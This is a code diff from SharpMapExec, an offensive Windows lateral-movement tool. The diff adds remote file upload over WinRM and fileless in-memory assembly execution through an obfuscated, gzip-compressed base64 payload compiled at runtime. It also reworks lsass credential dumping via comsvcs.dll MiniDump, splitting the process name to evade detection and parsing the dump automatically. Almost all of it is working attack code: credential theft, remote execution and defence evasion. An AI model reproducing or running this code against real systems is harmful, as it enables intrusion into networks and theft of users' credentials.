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";
	100	+	string function = @"
	101	+	$b64 = '{0}'
	102	+	$output = New-Object System.IO.MemoryStream
	103	+	$Stream = New-Object IO.Compression.GZipStream([IO.MemoryStream][Convert]::FromBase64String($b64),[IO.Compression.CompressionMode]::Decompress)
	104	+	$Stream.CopyTo($output)
	105	+	$data = [System.Text.Encoding]::utf8.GetString($output.ToArray())
	106	+	add-type -Language CSharp $data
206	107
207		-	$null = [Win32.Kernel32]::CreateProcess(
208		-	'C:\windows\System32\cmd.exe',
209		-	'/c powershell -enc {0}',
210		-	[ref]$ps,
211		-	[ref]$ts,
212		-	$true,
213		-	$EXTENDED_STARTUPINFO_PRESENT -bor $CREATE_NO_WINDOW,
214		-	[intptr]::Zero,
215		-	'C:\Windows\System32',
216		-	[ref]$siEx,
217		-	[ref]$pInfo
218		-	)
219		-	if ($siEx.lpAttributeList -ne [IntPtr]::Zero) {{
220		-	$null = [Win32.Kernel32]::DeleteProcThreadAttributeList($siEx.lpAttributeList)
221		-	[System.Runtime.InteropServices.Marshal]::FreeHGlobal($siEx.lpAttributeList)
222		-	}}
223		-	if ($pInfo.hProcess -ne [IntPtr]::Zero) {{
224		-	$null = [Win32.Kernel32]::CloseHandle($pInfo.hProcess)
225		-	}}
226		-	if ($pInfo.hThread -ne [IntPtr]::Zero) {{
227		-	$null = [Win32.Kernel32]::CloseHandle($pInfo.hThread)
228		-	}}
229		-	if($pInfo.dwProcessId -ne 0){{
230		-	return "" [+] System Pid Created: $($pInfo.dwProcessId)""
231		-	}}else{{
232		-	return $False
233		-	}}
	108	+	[ConsoleApp1.Program]::DelegWalk('{1}')
234	109		";
235		-	return String.Format(function, Convert.ToBase64String(Encoding.Unicode.GetBytes(command)));
	110	+	return String.Format(function, csFile, Convert.ToBase64String(Encoding.Unicode.GetBytes(command)));
236	111		}
237	112
238	113		public static string FindSystemCred()
		skipped 28 lines
267	142		""$env:SystemDrive\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys"") \| where{test-path $_}) \| get-Childitem -force).fullname \| where{$_}
268	143		";
269	144		}
	145	+
270	146		public static string CopyFile(string path)
271	147		{
272	148		return String.Format(@"
		skipped 11 lines
284	160		", path);
285	161		}
286	162
	163	+	public static string UploadFile(string data, string path)
	164	+	{
	165	+	return String.Format(@"
	166	+	$b64 = '{0}'
	167	+	$bytes = [Convert]::FromBase64String($b64)
	168	+	$output = New-Object System.IO.MemoryStream
	169	+	$Stream = New-Object IO.Compression.GZipStream([IO.MemoryStream]$bytes,[IO.Compression.CompressionMode]::Decompress)
	170	+	$Stream.CopyTo($output)
	171	+	[io.file]::WriteAllBytes('{1}', $output.ToArray())
	172	+	", data, path);
	173	+	}
	174	+
287	175		public static string DecompressData(string data)
288	176		{
289	177		return String.Format(@"
		skipped 5 lines
295	183		", data);
296	184		}
297	185
298		-	public static string ExecuteAssembly(string path, string arguments, List<string> flags)
	186	+	public static string ExecuteAssembly(string path, string arguments)
299	187		{
	188	+	string file = Compress(File.ReadAllBytes(path));
	189	+	byte[] bytes = File.ReadAllBytes(path);
	190	+	string template;
	191	+
300	192		if (String.IsNullOrEmpty(arguments))
301	193		{
302	194		arguments = "";
303	195		}
304		-	string caller;
305		-	if (flags.Contains("system"))
306		-	{
307		-	caller = RunAsSystem("$([Loader.Program]::LoadAssembly($arg) \| out-string)");
308		-	}
309		-	else
310		-	{
311		-	caller = "$([Loader.Program]::LoadAssembly($arg) \| out-string)";
312		-	}
313		-	byte[] bytes = File.ReadAllBytes(path);
314		-	string template = String.Format(@"
	196	+
	197	+	template = string.Format(@"
315	198		$Code= @'
316	199		using System;
317	200		using System.IO;
	201	+	using System.IO.Compression;
318	202		using System.Linq;
319	203		using System.Reflection;
320	204		namespace Loader
321	205		{{
322	206		public static class Program
323	207		{{
	208	+
	209	+	public static byte[] Decompress(byte[] data)
	210	+	{{
	211	+	using (var compressedStream = new MemoryStream(data))
	212	+	using (var zipStream = new GZipStream(compressedStream, CompressionMode.Decompress))
	213	+	using (var resultStream = new MemoryStream())
	214	+	{{
	215	+	zipStream.CopyTo(resultStream);
	216	+	return resultStream.ToArray();
	217	+	}}
	218	+	}}
	219	+
324	220		public static string LoadAssembly(string[] args)
325	221		{{
326		-	StringWriter stringWriter = new StringWriter();
327		-	Console.SetOut(stringWriter);
328		-	Console.SetError(stringWriter);
329		-	byte[] bin = Convert.FromBase64String(""{0}"");
	222	+
	223	+	TextWriter realStdOut = Console.Out;
	224	+	TextWriter realStdErr = Console.Error;
	225	+	TextWriter stdOutWriter = new StringWriter();
	226	+	TextWriter stdErrWriter = new StringWriter();
	227	+	Console.SetOut(stdOutWriter);
	228	+	Console.SetError(stdErrWriter);
	229	+
	230	+	byte[] bin = Decompress(Convert.FromBase64String(""{0}""));
330	231		Assembly a = Assembly.Load(bin);
331	232		try
332	233		{{
		skipped 11 lines
344	245		method.Invoke(o, null);
345	246		}}
346	247		}}
347		-	return stringWriter.ToString();
	248	+
	249	+	Console.Out.Flush();
	250	+	Console.Error.Flush();
	251	+	Console.SetOut(realStdOut);
	252	+	Console.SetError(realStdErr);
	253	+
	254	+	string output = """";
	255	+	output += stdOutWriter.ToString();
	256	+	output += stdErrWriter.ToString();
	257	+	return output;
	258	+
348	259		}}
349	260		}}
350	261		}}
		skipped 2 lines
353	264		[array]$arg = @'
354	265		null {1}
355	266		'@.split()
356		-	", Convert.ToBase64String(bytes), arguments);
357		-
	267	+	", file, arguments);
358	268		return String.Format(@"
359	269		{0}
360	270		iEx $data
361		-	{1}
362		-	", DecompressData(Misc.CompressData(template)), caller);
	271	+	$([Loader.Program]::LoadAssembly($arg) \| out-string)
	272	+	", DecompressData(Misc.CompressData(template)));
363	273		}
364	274		}
365	275		}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/KerberosWinrm.cs

		skipped 25 lines
26	26		Console.WriteLine("[-] Need path and destination");
27	27		return;
28	28		}
	29	+	if (module.Contains("upload") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
	30	+	{
	31	+	Console.WriteLine("[-] Need path and destination");
	32	+	return;
	33	+	}
29	34		StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags);
30	35		//var listOfTasks = new List<Task>();
31	36		//listOfTasks.Add(new Task(() => StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, flags)));
		skipped 71 lines
103	108		{
104	109		Wsman.CopyFile(computername, path, destination);
105	110		}
	111	+	else if (module.Contains("upload"))
	112	+	{
	113	+	Wsman.UploadFile(computername, path, destination);
	114	+	}
106	115		Console.WriteLine("");
107	116		}
108	117		}
		skipped 47 lines
156	165		else if (module.Contains("download"))
157	166		{
158	167		Wsman.CopyFile(computername, path, destination);
	168	+	}
	169	+	else if (module.Contains("upload"))
	170	+	{
	171	+	Wsman.UploadFile(computername, path, destination);
159	172		}
160	173		Console.WriteLine("");
161	174		}
		skipped 5 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/NtlmWinrm.cs

		skipped 26 lines
27	27		Console.WriteLine("[-] Need path and destination");
28	28		return;
29	29		}
	30	+	if (module.Contains("upload") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
	31	+	{
	32	+	Console.WriteLine("[-] Need path and destination");
	33	+	return;
	34	+	}
30	35		//StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags);
31	36		var listOfTasks = new List<Task>();
32	37		listOfTasks.Add(new Task(() => StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags)));
		skipped 49 lines
82	87		{
83	88		Wsman.CopyFile(computername, path, destination);
84	89		}
	90	+	else if (module.Contains("upload"))
	91	+	{
	92	+	Wsman.UploadFile(computername, path, destination);
	93	+	}
85	94		Console.WriteLine("");
86	95		}
87	96		}
		skipped 45 lines
133	142		else if (module.Contains("download"))
134	143		{
135	144		Wsman.CopyFile(computername, path, destination);
	145	+	}
	146	+	else if (module.Contains("upload"))
	147	+	{
	148	+	Wsman.UploadFile(computername, path, destination);
136	149		}
137	150		Console.WriteLine("");
138	151		}
		skipped 7 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Wsman.cs

		skipped 3 lines
4	4		using System.Collections.ObjectModel;
5	5		using System.Diagnostics;
6	6		using System.IO;
7		-	using System.IO.Compression;
8	7		using System.Linq;
9	8		using System.Management.Automation;
10	9		using System.Management.Automation.Runspaces;
11	10		using System.Text;
12	11		using System.Threading;
13	12		using static SharpMapExec.Helpers.SecurityContext;
	13	+	using static SharpMapExec.Helpers.Misc;
14	14
15	15		namespace SharpMapExec.Lib
16	16		{
17	17		public class Wsman
18	18		{
	19	+
19	20		public static (Collection<PSObject>, Collection<ErrorRecord>) InvokeJeaCommand(string computer, string command, string auth = "ntlm", string scheme = "HTTP", bool display = true)
20	21		{
21	22		Collection<PSObject> result = new Collection<PSObject>();
		skipped 56 lines
78	79		return (result, error);
79	80		}
80	81
81		-	public static (Collection<PSObject>, Collection<ErrorRecord>) InvokeCommand(string computer, string argument, bool AsSystem = false, string auth = "ntlm", string scheme = "HTTP", bool display = true, bool AmsiBypass = false)
	82	+	public static (Collection<PSObject>, Collection<ErrorRecord>) InvokeCommand(string computer, string argument, bool AsSystem = false, string auth = "ntlm", string scheme = "HTTP", bool display = true, bool AmsiBypass = false, bool delegWalk = false)
82	83		{
83	84		Collection<PSObject> result = new Collection<PSObject>();
84	85		Collection<ErrorRecord> error = new Collection<ErrorRecord>();
		skipped 14 lines
99	100		if (AsSystem)
100	101		{
101	102		argument = PsFunction.RunAsSystem(argument);
	103	+	}
	104	+	if (delegWalk)
	105	+	{
	106	+	argument = PsFunction.RunDelegationWalk(argument);
102	107		}
103	108		try
104	109		{
		skipped 110 lines
215	220		}
216	221		}
217	222
218		-	public static void CopyFile(string computer, string path, string destination, bool delete = false, string auth = "ntlm", string scheme = "http")
	223	+	public static void UploadFile(string computer, string path, string destination, string auth = "ntlm", string scheme = "http")
	224	+	{
	225	+	if (auth != "kerberos")
	226	+	{
	227	+	auth = "Negotiate";
	228	+	}
	229	+	try
	230	+	{
	231	+	string data = Compress(File.ReadAllBytes(path));
	232	+	(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, PsFunction.UploadFile(data, destination), false, auth, scheme, true);
	233	+	foreach (PSObject obj in result)
	234	+	{
	235	+	if (obj.ToString().Length == 0)
	236	+	{
	237	+	Console.WriteLine(" [-] Upload Failed");
	238	+	}
	239	+	}
	240	+	}
	241	+	catch (Exception e) // Connecting to remote server 192.168.1.10 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic
	242	+	{
	243	+	Console.WriteLine(e.Message);
	244	+	}
	245	+	}
	246	+
	247	+	public static void UploadContent(string computer, string content, string destination, string auth = "ntlm", string scheme = "http")
	248	+	{
	249	+	if (auth != "kerberos")
	250	+	{
	251	+	auth = "Negotiate";
	252	+	}
	253	+	try
	254	+	{
	255	+	string data = Compress(Encoding.ASCII.GetBytes(content));
	256	+	(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, PsFunction.UploadFile(data, destination), false, auth, scheme, true);
	257	+	foreach (PSObject obj in result)
	258	+	{
	259	+	if (obj.ToString().Length == 0)
	260	+	{
	261	+	Console.WriteLine(" [-] Upload Failed");
	262	+	}
	263	+	}
	264	+	}
	265	+	catch (Exception e) // Connecting to remote server 192.168.1.10 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic
	266	+	{
	267	+	Console.WriteLine(e.Message);
	268	+	}
	269	+	}
	270	+
	271	+	public static void CopyFile(string computer, string path, string destination, bool delete = false, string auth = "ntlm", string scheme = "http", bool parseLsass = false)
219	272		{
220	273		if (auth != "kerberos")
221	274		{
		skipped 11 lines
233	286		else
234	287		{
235	288		byte[] compressfile = Convert.FromBase64String(obj.ToString());
236		-	using (var memoryStream = new MemoryStream(compressfile))
	289	+	byte[] data = Decompress(compressfile);
	290	+	if (parseLsass)
237	291		{
238		-	using (var gzip = new GZipStream(memoryStream, CompressionMode.Decompress))
239		-	{
240		-	using (var decompressed = new MemoryStream())
241		-	{
242		-	gzip.CopyTo(decompressed);
243		-	File.WriteAllBytes(destination, decompressed.ToArray());
244		-	Console.WriteLine(String.Format(" [+] Copied {0}kb to {1}", decompressed.ToArray().Length, destination));
245		-	}
246		-	}
	292	+	Minidump.Program.parse(data);
247	293		}
	294	+	File.WriteAllBytes(destination, data.ToArray());
	295	+	Console.WriteLine(String.Format(" [+] Copied {0}kb to {1}", data.ToArray().Length, destination));
248	296		}
249	297		}
250	298		if (delete)
251	299		{
252	300		try
253	301		{
254		-	(Collection<PSObject> result2, Collection<ErrorRecord> errors2) = InvokeCommand(computer, String.Format("remove-item {0} -force", path), false, auth, scheme);
	302	+	(Collection<PSObject> result2, Collection<ErrorRecord> errors2) = InvokeCommand(computer, String.Format("if(test-path {0}){{remove-item {0} -force}}", path), false, auth, scheme);
255	303		}
256	304		catch
257	305		{
		skipped 10 lines
268	316		public static void ExecuteAssembly(string computer, string path, string argument, List<string> flags, string auth = "ntlm", string scheme = "HTTP")
269	317		{
270	318		Console.WriteLine("[*] Executing Assembly");
271		-	string command = PsFunction.ExecuteAssembly(path, argument, flags);
	319	+	string caller;
	320	+	string randomPath = "C:\\windows\\temp\\" + Guid.NewGuid().ToString() + ".ps1";
	321	+	string command = PsFunction.ExecuteAssembly(path, argument);
	322	+
	323	+	if (flags.Contains("system"))
	324	+	{
	325	+	caller = PsFunction.RunAsSystem(randomPath);
	326	+	UploadContent(computer, command, randomPath, auth, scheme);
	327	+	}
	328	+	else if (flags.Contains("delegwalk"))
	329	+	{
	330	+	caller = PsFunction.RunDelegationWalk(randomPath);
	331	+	UploadContent(computer, command, randomPath, auth, scheme);
	332	+	}
	333	+	else
	334	+	{
	335	+	caller = command;
	336	+	}
	337	+
272	338		try
273	339		{
274		-	(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, command, false, auth, scheme);
	340	+	(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, caller, false, auth, scheme);
275	341		foreach (var obj in result)
276	342		{
277	343		Console.WriteLine(obj.ToString());
		skipped 3 lines
281	347		Console.WriteLine("[-] Error While Executing Assembly");
282	348		return;
283	349		}
	350	+	//delete uploaded ps file
	351	+	if (caller != command)
	352	+	{
	353	+	try
	354	+	{
	355	+	(Collection<PSObject> result2, Collection<ErrorRecord> errors2) = InvokeCommand(computer, String.Format("if(test-path {0}){{remove-item {0} -force}}", randomPath), false, auth, scheme);
	356	+	}
	357	+	catch
	358	+	{
	359	+	Console.WriteLine(String.Format(" [-] Failed to delete {0}", randomPath));
	360	+	}
	361	+	}
284	362		}
285	363		catch (Exception e)
286	364		{
287		-	Console.WriteLine("[-] Failed to Executing Assembly");
	365	+	Console.WriteLine("[-] Failed While Executing Assembly");
288	366		Console.WriteLine(e);
289	367		return;
290	368		}
		skipped 2 lines
293	371		public static void InvokeComSvcsLsassDump(string computer, string auth = "ntlm", string scheme = "HTTP")
294	372		{
295	373		Console.WriteLine("[*] Dumping lsass");
296		-	string ecmd = @"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process ('l'+'s'+'a'+'s'+'s')).Id C:\windows\temp\Coredump.dmp full";
297		-	string argument = String.Format(@"start-process powershell -WindowStyle Hidden -ArgumentList '-NoP -enc {0} ' -wait ; test-path C:\Windows\temp\Coredump.dmp", Convert.ToBase64String(Encoding.Unicode.GetBytes(ecmd)));
	374	+	string path = "C:\\Windows\\temp\\" + Guid.NewGuid().ToString() + ".dmp";
	375	+	string ecmd = string.Format(@"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process ('l'+'s'+'a'+'s'+'s')).Id {0} full", path);
	376	+	string argument = string.Format(@"start-process powershell -WindowStyle Hidden -ArgumentList '-NoP -enc {0} ' -wait ; test-path {1}", Convert.ToBase64String(Encoding.Unicode.GetBytes(ecmd)), path);
298	377		//string argument = "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\\windows\\temp\\Coredump.dmp full; Wait-Process rundll32";
299	378		string destination = Path.Combine("loot", computer, "lsass.dmp");
300		-	string path = "C:\\Windows\\temp\\Coredump.dmp";
301	379		try
302	380		{
303	381		(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, argument, false, auth, scheme);
304	382		if (errors.Count > 0)
305	383		{
306	384		Console.WriteLine("[-] Failed to Dump Lsass");
307		-	return;
	385	+	throw new Exception();
308	386		}
309	387		if(result[0].ToString() == "False")
310	388		{
311	389		Console.WriteLine("[-] Failed to Dump Lsass");
	390	+	throw new Exception();
	391	+	}
	392	+	try
	393	+	{
	394	+	Console.WriteLine("[*] Copying lsass dump");
	395	+	CopyFile(computer, path, destination, true, parseLsass: true);
312	396		return;
313	397		}
	398	+	catch
	399	+	{
	400	+	Console.WriteLine("[-] Failed to Copy Lsass Dump File");
	401	+	}
314	402		}
315	403		catch
316	404		{
317	405		Console.WriteLine("[-] Failed to Dump Lsass");
318		-	return;
319	406		}
320	407		try
321	408		{
322		-	Console.WriteLine("[*] Copying lsass dump");
323		-	CopyFile(computer, path, destination, true);
	409	+	(Collection<PSObject> result2, Collection<ErrorRecord> errors2) = InvokeCommand(computer, String.Format("if(test-path {0}){{remove-item {0} -force}}", path), false, auth, scheme);
324	410		}
325	411		catch
326	412		{
327		-	Console.WriteLine("[-] Failed to Copy Lsass Dump File");
	413	+	Console.WriteLine(String.Format(" [-] Failed to delete {0}", path));
328	414		}
329	415		}
330	416
		skipped 168 lines
499	585		bool checkadmin = false;
500	586		StringBuilder stringBuilder = new StringBuilder();
501	587		bool AsSystem = false;
	588	+	bool delegWalk = false;
502	589		bool DisableAmsi = false;
503	590
504	591		if (flags.Contains("system"))
505	592		{
506	593		AsSystem = true;
	594	+	}
	595	+	else if (flags.Contains("delegwalk"))
	596	+	{
	597	+	delegWalk = true;
507	598		}
508	599		if (argument.Length == 0)
509	600		{
		skipped 6 lines
516	607		}
517	608		try
518	609		{
519		-	(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, argument, AsSystem, auth, scheme, false, DisableAmsi);
	610	+	(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, argument, AsSystem, auth, scheme, false, DisableAmsi, delegWalk: delegWalk);
520	611		foreach (PSObject obj in result)
521	612		{
522	613		stringBuilder.AppendLine(obj.ToString());
		skipped 45 lines

SharpMapExec/HiveParser/Crypto.cs SharpMapExec/Projects/HiveParser/Crypto.cs

Content is identical

SharpMapExec/HiveParser/LsaSecret.cs SharpMapExec/Projects/HiveParser/LsaSecret.cs

Content is identical

SharpMapExec/HiveParser/NL_Record.cs SharpMapExec/Projects/HiveParser/NL_Record.cs

Content is identical

SharpMapExec/HiveParser/NodeKey.cs SharpMapExec/Projects/HiveParser/NodeKey.cs

Content is identical

SharpMapExec/HiveParser/Registry.cs SharpMapExec/Projects/HiveParser/Registry.cs

Content is identical

SharpMapExec/HiveParser/RegistryHive.cs SharpMapExec/Projects/HiveParser/RegistryHive.cs

Content is identical

SharpMapExec/HiveParser/ValueKey.cs SharpMapExec/Projects/HiveParser/ValueKey.cs

Content is identical

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Crypto/BCrypt.cs

1	+	using Microsoft.Win32.SafeHandles;
2	+	using Minidump.Decryptor;
3	+	using System;
4	+	using System.Linq;
5	+	using System.Runtime.ConstrainedExecution;
6	+	using System.Runtime.InteropServices;
7	+	using System.Security;
8	+
9	+	namespace Minidump.Crypto
10	+	{
11	+	#pragma warning disable 618
12	+
13	+	[SecurityCritical(SecurityCriticalScope.Everything)]
14	+	#pragma warning restore 618
15	+	public sealed class SafeBCryptAlgorithmHandle : SafeHandleZeroOrMinusOneIsInvalid
16	+	{
17	+	private SafeBCryptAlgorithmHandle() : base(true)
18	+	{
19	+	}
20	+
21	+	protected override bool ReleaseHandle()
22	+	{
23	+	return (NTStatus)BCrypt.BCryptCloseAlgorithmProvider(handle, 0) == NTStatus.Success;
24	+	}
25	+	}
26	+
27	+	[SecuritySafeCritical]
28	+	public sealed class SafeBCryptKeyHandle : SafeHandleZeroOrMinusOneIsInvalid
29	+	{
30	+	internal SafeBCryptKeyHandle() : base(true)
31	+	{
32	+	}
33	+
34	+	[ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
35	+	protected override bool ReleaseHandle()
36	+	{
37	+	return (NTStatus)BCrypt.BCryptDestroyKey(handle) == NTStatus.Success;
38	+	}
39	+	}
40	+
41	+	public enum NTStatus : uint
42	+	{
43	+	Success = 0x00000000,
44	+	Wait0 = 0x00000000,
45	+	Wait1 = 0x00000001,
46	+	Wait2 = 0x00000002,
47	+	Wait3 = 0x00000003,
48	+	Wait63 = 0x0000003f,
49	+	Abandoned = 0x00000080,
50	+	AbandonedWait0 = 0x00000080,
51	+	AbandonedWait1 = 0x00000081,
52	+	AbandonedWait2 = 0x00000082,
53	+	AbandonedWait3 = 0x00000083,
54	+	AbandonedWait63 = 0x000000bf,
55	+	UserApc = 0x000000c0,
56	+	KernelApc = 0x00000100,
57	+	Alerted = 0x00000101,
58	+	Timeout = 0x00000102,
59	+	Pending = 0x00000103,
60	+	Reparse = 0x00000104,
61	+	MoreEntries = 0x00000105,
62	+	NotAllAssigned = 0x00000106,
63	+	SomeNotMapped = 0x00000107,
64	+	OpLockBreakInProgress = 0x00000108,
65	+	VolumeMounted = 0x00000109,
66	+	RxActCommitted = 0x0000010a,
67	+	NotifyCleanup = 0x0000010b,
68	+	NotifyEnumDir = 0x0000010c,
69	+	NoQuotasForAccount = 0x0000010d,
70	+	PrimaryTransportConnectFailed = 0x0000010e,
71	+	PageFaultTransition = 0x00000110,
72	+	PageFaultDemandZero = 0x00000111,
73	+	PageFaultCopyOnWrite = 0x00000112,
74	+	PageFaultGuardPage = 0x00000113,
75	+	PageFaultPagingFile = 0x00000114,
76	+	CrashDump = 0x00000116,
77	+	ReparseObject = 0x00000118,
78	+	NothingToTerminate = 0x00000122,
79	+	ProcessNotInJob = 0x00000123,
80	+	ProcessInJob = 0x00000124,
81	+	ProcessCloned = 0x00000129,
82	+	ProcessIsTerminating = 0xC000010A,
83	+	FileLockedWithOnlyReaders = 0x0000012a,
84	+	FileLockedWithWriters = 0x0000012b,
85	+
86	+	Informational = 0x40000000,
87	+	ObjectNameExists = 0x40000000,
88	+	ThreadWasSuspended = 0x40000001,
89	+	WorkingSetLimitRange = 0x40000002,
90	+	ImageNotAtBase = 0x40000003,
91	+	RegistryRecovered = 0x40000009,
92	+
93	+	Warning = 0x80000000,
94	+	GuardPageViolation = 0x80000001,
95	+	DatatypeMisalignment = 0x80000002,
96	+	Breakpoint = 0x80000003,
97	+	SingleStep = 0x80000004,
98	+	BufferOverflow = 0x80000005,
